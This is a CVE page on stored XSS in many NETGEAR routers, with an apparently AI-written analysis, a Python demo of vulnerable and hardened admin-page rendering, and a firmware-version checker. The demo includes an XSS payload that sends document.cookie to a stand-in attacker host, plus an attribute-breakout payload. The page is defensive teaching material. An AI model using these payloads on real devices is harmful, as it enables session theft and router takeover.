CVE-2019-20738
Description
Certain NETGEAR devices are affected by stored XSS. This affects D6100 before 1.0.0.58, D7800 before 1.0.1.34, JNR1010v2 before 1.1.0.50, JWNR2010v5 before 1.1.0.50, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, R6020 before 1.0.0.30, R6080 before 1.0.0.30, R6100 before 1.0.1.16, R6120 before 1.0.0.40, R6700v2 before 1.2.0.14, R6800 before 1.2.0.14, R6900v2 before 1.2.0.14, R7500v2 before 1.0.3.26, R7800 before 1.0.2.46, R9000 before 1.0.4.2, WN3000RPv2 before 1.0.0.52, WN3000RPv3 before 1.0.2.78, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.50, WNR2000v5 before 1.0.0.64, WNR2020 before 1.1.0.50, and WNR2050 before 1.1.0.50. NOTE: this may be a result of an incomplete fix for CVE-2017-18866.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored cross-site scripting vulnerability in multiple NETGEAR devices could allow attackers to execute arbitrary JavaScript in the context of the admin interface.
Vulnerability
A stored cross-site scripting (XSS) vulnerability exists in multiple NETGEAR routers, gateways, and WiFi systems, including D6100, D7800, JNR1010v2, JWNR2010v5, RBK50, RBR50, RBS50, R6020, R6080, R6100, R6120, R6700v2, R6800, R6900v2, R7500v2, R7800, R9000, WN3000RPv2, WN3000RPv3, WNDR3700v4, WNDR3700v5, WNDR4300v1, WNDR4300v2, WNDR4500v3, WNR1000v4, WNR2000v5, WNR2020, and WNR2050 running firmware versions prior to the fixed releases listed in the advisory [1]. The vulnerability may result from an incomplete fix for CVE-2017-18866. Stored XSS allows an attacker to inject malicious script code that is stored on the device and executed when an administrator accesses certain pages.
Exploitation
The CVE record does not name the vulnerable parameter or page, nor does it state what privilege is needed to write to it. In the common stored-XSS pattern on these devices, an attacker who can submit a value that the admin interface later echoes (normally an authenticated administrator, though the record does not rule out other write paths) places JavaScript in that field; the device stores the string verbatim and renders it without output encoding when an administrator later opens the page that displays it, for example a status or configuration page [1]. Once stored, the payload fires on every view of that page, so no interaction beyond routine administration is required.
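To make the pattern concrete, here is an added example, not code from NETGEAR or from any of the listed firmware images: a minimal settings store and two renderers for an admin status row, one that concatenates stored values straight into the page (the bug class) and one that encodes on output (the fix). The field names, the page template and the two payloads are assumptions, since the CVE record does not identify the vulnerable parameter. An HTML-parser audit shows which render actually produces a script element or an event-handler attribute, which is what matters to the administrator's browser.

```python
"""Stored XSS in an admin page: vulnerable vs. hardened rendering.

Added example, not NETGEAR code. It models the generic pattern the CVE
describes: an attacker-controlled string is saved on the device and later
rendered into an admin page. Field names, template and payloads are
assumptions; the CVE record does not name the vulnerable parameter.
"""
import html
from html.parser import HTMLParser

# Constructed attacker inputs: one for HTML element-text context, one that
# breaks out of a double-quoted attribute. Both are typical stored-XSS probes.
TEXT_PAYLOAD = 'my-laptop<script>fetch("http://attacker.test/?c="+document.cookie)</script>'
ATTR_PAYLOAD = 'x" onfocus="alert(document.domain)" autofocus="'


def store_setting(settings, field, value):
    """Hypothetical settings store: values are saved exactly as submitted."""
    settings[field] = value


def render_vulnerable(settings):
    """Bug: stored values are concatenated into the markup with no encoding."""
    return (
        "<tr><td>Device name</td><td>" + settings["device_name"] + "</td></tr>\n"
        '<tr><td>Note</td><td><input name="note" value="' + settings["note"] + '"></td></tr>'
    )


def render_hardened(settings):
    """Fix: encode for the output context. html.escape() with the default
    quote=True neutralises both element text and double-quoted attributes."""
    return (
        "<tr><td>Device name</td><td>" + html.escape(settings["device_name"]) + "</td></tr>\n"
        '<tr><td>Note</td><td><input name="note" value="' + html.escape(settings["note"]) + '"></td></tr>'
    )


class _Audit(HTMLParser):
    """Record what a browser-like tokenizer sees: script elements and on* attributes."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        for name, _value in attrs:
            if name.startswith("on"):
                self.event_handlers.append((tag, name))


def audit(markup):
    """Return the number of <script> elements and the (tag, attr) event handlers parsed."""
    parser = _Audit()
    parser.feed(markup)
    parser.close()
    return {"script_tags": parser.script_tags, "event_handlers": parser.event_handlers}


def demo():
    """Store both payloads, then audit the vulnerable and the hardened render."""
    settings = {}
    store_setting(settings, "device_name", TEXT_PAYLOAD)
    store_setting(settings, "note", ATTR_PAYLOAD)
    return audit(render_vulnerable(settings)), audit(render_hardened(settings))


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("vulnerable render:", vulnerable)
    print("hardened render:  ", hardened)
```

The vulnerable render yields one `script` element and an `onfocus` handler on the input; the hardened render yields neither, because the browser parses `&lt;script&gt;` as text and `&quot;` as part of the attribute value rather than its terminator. Encoding must match the context: the same `html.escape` is not sufficient for values placed inside a `<script>` block or a URL, which need their own encoders.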
Impact
Successful exploitation runs attacker-controlled JavaScript in the administrator's browser with the origin of the device's admin interface. Because the browser attaches the administrator's credentials to requests the script makes, the script can drive any action the interface exposes: read and change device configuration, change the administrator password, or enable remote management, in addition to stealing session material and staging attacks against other hosts on the network. The flaw is confined to the web interface; it does not by itself provide code execution on the device.
Mitigation
NETGEAR has released fixed firmware versions for all affected models: D6100 1.0.0.58, D7800 1.0.1.34, JNR1010v2 1.1.0.50, JWNR2010v5 1.1.0.50, RBK50 2.3.5.30, RBR50 2.3.5.30, RBS50 2.3.5.30, R6020 1.0.0.30, R6080 1.0.0.30, R6100 1.0.1.16, R6120 1.0.0.40, R6700v2 1.2.0.14, R6800 1.2.0.14, R6900v2 1.2.0.14, R7500v2 1.0.3.26, R7800 1.0.2.46, R9000 1.0.4.2, WN3000RPv2 1.0.0.52, WN3000RPv3 1.0.2.78, WNDR3700v4 1.0.2.102, WNDR3700v5 1.1.0.54, WNDR4300v1 1.0.2.104, WNDR4300v2 1.0.0.48, WNDR4500v3 1.0.0.48, WNR1000v4 1.1.0.50, WNR2000v5 1.0.0.64, WNR2020 1.1.0.50, and WNR2050 1.1.0.50 [1]. Because the record notes that this issue may stem from an incomplete fix for CVE-2017-18866, having applied the earlier fix is not sufficient; confirm that the installed firmware is at or above the version listed here for the exact model and hardware revision (for example WNDR3700v4 and WNDR3700v5 have different fixed versions), and update as soon as possible.
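The version list is easy to misread because firmware versions must be compared numerically per component: 1.0.2.102 is newer than 1.0.2.46 even though it sorts earlier as a string. The following added checker, not a NETGEAR tool, parses the model and fixed-version pairs straight from the CVE description text and flags an installed firmware as in range for its model. The inventory it runs over is constructed sample data, not real devices.

```python
"""Is a given NETGEAR model/firmware pair inside the CVE-2019-20738 range?

Added example, not NETGEAR tooling. The fixed versions are parsed from the
CVE description text reproduced in DESCRIPTION; nothing else is assumed
about the devices.
"""
import re

# Verbatim CVE-2019-20738 description (only the "X before Y" pairs are used).
DESCRIPTION = (
    "Certain NETGEAR devices are affected by stored XSS. This affects D6100 before "
    "1.0.0.58, D7800 before 1.0.1.34, JNR1010v2 before 1.1.0.50, JWNR2010v5 before "
    "1.1.0.50, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, "
    "R6020 before 1.0.0.30, R6080 before 1.0.0.30, R6100 before 1.0.1.16, R6120 before "
    "1.0.0.40, R6700v2 before 1.2.0.14, R6800 before 1.2.0.14, R6900v2 before 1.2.0.14, "
    "R7500v2 before 1.0.3.26, R7800 before 1.0.2.46, R9000 before 1.0.4.2, WN3000RPv2 "
    "before 1.0.0.52, WN3000RPv3 before 1.0.2.78, WNDR3700v4 before 1.0.2.102, "
    "WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before "
    "1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.50, WNR2000v5 before "
    "1.0.0.64, WNR2020 before 1.1.0.50, and WNR2050 before 1.1.0.50. NOTE: this may be "
    "a result of an incomplete fix for CVE-2017-18866."
)

# "<model> before <dotted version>"; the version group stops before a trailing "." or ",".
_PAIR = re.compile(r"\b([A-Za-z0-9]+) before (\d+(?:\.\d+)+)")


def parse_fixed_versions(text=DESCRIPTION):
    """Map model name -> first fixed firmware version, exactly as the record states it."""
    return dict(_PAIR.findall(text))


def version_key(version):
    """'1.0.2.102' -> (1, 0, 2, 102): compare components as integers, never as strings."""
    return tuple(int(part) for part in version.split("."))


def is_vulnerable(model, installed, table=None):
    """True if the installed firmware is older than the fixed release for this model.

    Raises KeyError for models the CVE record does not list, rather than
    guessing: absence from the list is not evidence of safety.
    """
    table = parse_fixed_versions() if table is None else table
    return version_key(installed) < version_key(table[model])


# Constructed sample inventory (model, installed firmware); not real devices.
SAMPLE_INVENTORY = [
    ("R7800", "1.0.2.102"),      # newer than 1.0.2.46 numerically, "older" as a string
    ("R7800", "1.0.2.40"),
    ("WNDR3700v4", "1.0.2.102"),
    ("RBR50", "2.3.5.30"),
    ("R9000", "1.0.3.99"),
]


def check_fleet(inventory):
    """Return [(model, installed, vulnerable)] for every device in the inventory."""
    table = parse_fixed_versions()
    return [(m, v, is_vulnerable(m, v, table)) for m, v in inventory]


if __name__ == "__main__":
    for model, installed, bad in check_fleet(SAMPLE_INVENTORY):
        print(f"{model:12} {installed:10} {'UPDATE' if bad else 'ok'}")
```

A model that is not in the list raises rather than returning "not vulnerable"; the description enumerates only the models NETGEAR fixed under this advisory, so a missing model means the check has no data, not that the device is safe.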
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
NETGEAR devices
Patches
No patches discovered yet.
References
News mentions
No linked articles in our index yet.